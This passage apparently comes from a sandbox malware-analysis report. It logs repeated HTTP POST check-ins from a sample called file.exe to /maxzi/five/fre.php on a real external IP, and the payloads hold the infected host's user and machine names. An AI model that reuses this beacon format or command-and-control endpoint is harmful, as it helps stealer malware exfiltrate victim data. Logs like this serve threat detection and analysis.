Nov 22, 2024 17:38:34.331046104 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:35.739247084 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:36.009876966 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:36.394360065 CET	393	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:36.401062012 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:37.721430063 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:37.991627932 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:38.111285925 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:39.565046072 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:39.828217983 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:39.948024988 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:41.267765045 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:41.537769079 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:41.659081936 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:43.017709017 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:43.293705940 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:43.413429976 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:44.821378946 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:45.079622030 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:45.199702024 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:46.587224960 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:46.848512888 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:46.970644951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:48.298242092 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49757	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:48.569140911 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:48.693876982 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:50.103084087 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:50.374321938 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:50.493984938 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:51.915977001 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:52.189835072 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:52.309427023 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:53.760936022 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49760	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:54.037755966 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:54.159921885 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:55.610198021 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:55.886729002 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:56.007118940 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:57.457268953 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49768	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:57.727844954 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:57.847692966 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:38:59.302567005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:38:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49769	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:38:59.610678911 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:38:59.730254889 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:01.010632992 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49775	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:01.271894932 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:01.391644955 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:02.801037073 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49781	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:03.067959070 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:03.187494993 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:04.480725050 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49787	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:04.751878023 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:04.874345064 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:06.235555887 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49788	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:06.501547098 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:06.624696970 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:07.860249996 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49794	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:08.127332926 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:08.251882076 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:09.681982994 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49800	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:09.955069065 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:10.075035095 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:11.305012941 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49806	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:11.574165106 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
